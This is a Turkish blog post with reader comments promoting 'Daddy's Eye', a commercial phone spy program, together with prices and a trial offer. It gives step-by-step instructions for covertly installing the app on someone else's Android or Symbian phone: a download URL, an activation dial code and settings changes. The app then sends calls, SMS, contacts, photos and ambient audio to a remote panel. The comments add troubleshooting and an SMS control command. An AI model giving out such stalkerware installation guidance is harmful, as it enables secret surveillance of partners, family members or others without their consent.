DADDYS EYE CEP TELEFONU CASUSU

cep telefonu casus programı

Daddys Eye Cep Telefonu İzleme Programı
Evet 3 günlük deneme süresi veren süper bir cep telefonu casus programı ,öncelikle şunu belirtmek gerek; bu program resmi web sitesinde 3 aylık, 6 aylık ve12 aylık lisanslarla satılan bir programdır fakat aynı satış sitesi ücretsiz olarak 3 gün boyunca deneme kullanımı imkanı sunuyor. Eğer 3 günden sonra programdan memnun kaldıysanız ve hala kullanmaya devam etmek isterseniz ozaman satın alabiliyorsunuz.(Programın web sitesi ingilizcedir ayrıntılı açıklama ise aşağıdadır.)

Daddy's Eye Kurullumu
Program Android (samsung) veya Symbian (Nokia) olan tüm telefonlarda çalışır, bu programla telefonda yapılan herşeyi buna görüşme kayıtları ve görüşmelerin dinlemnesi,atılan sms ler ,telefon rehberi ,çekilen ve gönderilen fotoğraflar, gprs bilgisi,ortam dinlemesi ve daha bir çok şey dahil olmak üzere takip edebiliyorsunuz .

Programı izlemek istediğiniz telefonunuza kurmak çok kolay.Yaklaşık 3-5 dakika sürecektir. Aşağıdaki videoda zaten çok ayrıntılı gösteriyor,kısaca açıklamak gerekirse

1.Önce siteye (register yazan yerden) kayıt oluyorsunuz BURADAN
2.Sonra kayıt bilgilerinizle siteye giriyorsunuz BURADAN
3.Sitedeki control panelinize girdiğinizde Profile yazan bölümde sayfanın sol en alt kısmında bulunan subscription id numaranızı alıyorsunuz.(bu sizin 3 günlük deneme yapabilmeniz için gerekli olan numara ve kurulumda telefona gireceğiniz numaradır)

4.Sonra takip etmek istediğiniz cep telefonunuzun internet tarayıcısına şu adresi ( http://app.savemy.mobi ) yazıp adresi ziyaret ediyorsunuz. Adrese gider gitmez yükleme işlemi başlar, yüklemeyi aşağıdaki videoda açıkca gösterildiği gibi yapıyorsunuz. Yükleme sırasında symbian telefonlarda (yani nokia gibi)  Activation kısmına geldiğinizde Option yazan yere basıp subscription id numaranızı girin ve ok e basın. Bu sırada telefon internet ağlarını tarayıp uygun ağı bulunca aktivasyonu yapıcaktır. Bu işlem 1-2 dakika sürebilir beklemelisiniz. ve hepsi bu kadar. aktivasyan gerçekleşir. Nokia gibi symbian telefonlar için kurulum bu kadar.

 Android telefona yükleme yapacaksanız şayet (yani samsung gibi)  önce telefonu program yüklenebilir hale getirmelisiniz. Bunun için telefonun ana menüsünden önce Settings sonra Applications sonrada Unknown Sources yazan yere gelip burayı tikliyorsunuz yani enable yapıyorsunuz. Daha sonra aynı yukarıdaki işlemleri gerçekleştiriyorsunuz.

Android telefonlarda activasyonu gerçekleştirmek için yükleme bittikten hemen sonra
 *911911911911#  i tuşluyorsunuz ve ara tuşuna basıyorsunuz sorulduğunda gerekirse subscription id nizi giriyorsunuz ve böylece programı başlatmış oluyorsunuz. işleminiz bitmiş oluyor.İşlem karışık geldiyse aşağıdaki linkten resimli anlatımı bulabilirsiniz.

ANDROİD TELEFONA YÜKLEME RESİMLİ

5.Artık BURADAN  email ve şifre bilgilerinizle kontrol panelinize girip telefonunuzun bilgilerini görüntüliye bilirsiniz. Bilgiler her saatte bir bu adresteki control panelinize gönderilicektir.İlk bilgiler yüklemeyi bitirdiğiniz andan yaklaşık 1 saat sonra kontrol panelinize düşecektir.

NOT:  3 Günlük deneme zamanı sonunda eğer memnun kaldıysanız ve programı kullanmaya devam etmek isterseniz  kontrol panelinizin profil kısmında yer alan Buy Voucher Code yazan yere tıklayıp  1 aylık 6 aylık veya yıllık lisans alıp,aldığınız kodu  Renew Subscription yazan bölüme yazdığınızda programı kullanmaya devam edebilirsiniz.


Casus telefon dinleme programını 3 günlük deneme süresinden sonra satın almak istediğinizde
web sitesindeki satış Fiyatları şöyle
3 aylık 49$
6 aylık 69$
12 aylık 99$

Kurulum videosu

Bu bilgiler internetten toplanmış bilgilerdir .

16 yorum:

 1. Bu program hangi telefona yükleniyosa ondaki kayıtları mı gösteriyor?

  YanıtlaSil
 2. Adsız6/17/2013

  aynen öyle

  YanıtlaSil
 3. yaa olmuyor adresi giriyorum ama yükleme falan yapmıyor olumsuz sonuç veriyor şimdiye dek galaksi s3 nokia c3 te denedim hep aynı yardımcı olursanız sevinirim

  YanıtlaSil
 4. Adsız8/12/2013

  yukarıdaki bilgiler güncellendi,güncel yükleme bilgilerine göre bir kez daha deneyin olucaktır.

  YanıtlaSil
 5. Adsız8/22/2013

  bende yükledim denedim ve hatta satın aldım telefon görüşmeleri ve sms leri alabiliyorum ama ben tam yükleyemedim heralde bunu sayfamda hata veriyo(Settings will be applied when device connects to the server. Also you can send SMS command #:1:SubscriptionID:15 to apply settigs immediatelly. This warning message disappear when settings would be updated on the device.)bunu anlayamadım birde hedef telefonun ortamını nasıl dinleyebilirim

  YanıtlaSil
 6. Adsız8/23/2013

  hocam gayet iyi yüklemissin zaten,sana o mesajda diyorki: ayarlarda yaptığınız değişiklikler telefonun birdahaki mesaj gönderme zamanında aktif halegetirilecektir yani her saat başı gönderiyo ya bilgileri işte o saat başı geldiğinde seninde ayarların güncellenicek. bu arada ama acilen bu ayarları değiştirmek diyorsan sms le telefona #:1:-------:15 mesajını gönder ayarlarhemen güncellenir diyor. çizgili yere subscription id ni yazıcaksın tabii ,ama bana sorarsan hiç uğraşmaya değmez bekle saat başı gelince guncellesin. tElefon ortamını dinlemek içinde bir sms kodu var o kodu telefona mesaj atınca telefon kaydetmeye başlıyo zaten ,profilindenbak birazingilizcen varsa anlarsın hemen zaten.

  YanıtlaSil
 7. Adsız8/23/2013

  çok tşkrler açıklamalrınız için,sadece ortam dinleme olayını pek anlamadım ingilizcem yok ama profilimi netten çeviriyorum zaten ama sayfamdada pek ona benzer birşey göremedim

  YanıtlaSil
 8. Adsız9/11/2013

  en iyi casus program bu bence tıkır tıkır çalışıyo tavsiye ederim gençlik.

  YanıtlaSil
 9. site yöneticilerinin ilgilerinden dolayı teşekkür ederim. aradığım programı anında araştırıp bilgi verdikleri için minnetdarım

  YanıtlaSil
 10. thank youuuuuuuuuuu

  YanıtlaSil
 11. Adsız2/06/2014

  adamlar yapiiii gardaşım

  YanıtlaSil
 12. mrb. e72 telefona depro sis diye bir dosya geldi yükleme yp diyorum .çevrimiçi sertifika kontrolü yapılmadı diyor ne yapmam gerekiyor

  YanıtlaSil
 13. Adsız2/16/2014

  çevrim içisertifika kontrolü yapamıyor demek ; internete bağlanıp programın lisansını kontrol edemiyorum demektir, kurulum yaparken telefonun internete bağlanabiliyor olması gerekir aksi halde kurulum zaten yapamazsınız. telefonunuzun interneti olduğundan emin olun.

  YanıtlaSil
 14. çok aradım sonunda buldum :) teşekkürler

  YanıtlaSil
 15. Yüklediğimiz telefonda internetin aktif mi olması gerekiyor ??

  YanıtlaSil
 16. Adsız5/02/2014

  tabiki telefonun interneti olmalı aksi taktirde bilgileri size gönderemez, bilgiler internet üzerinden gönderiliyor çünkü.

  YanıtlaSil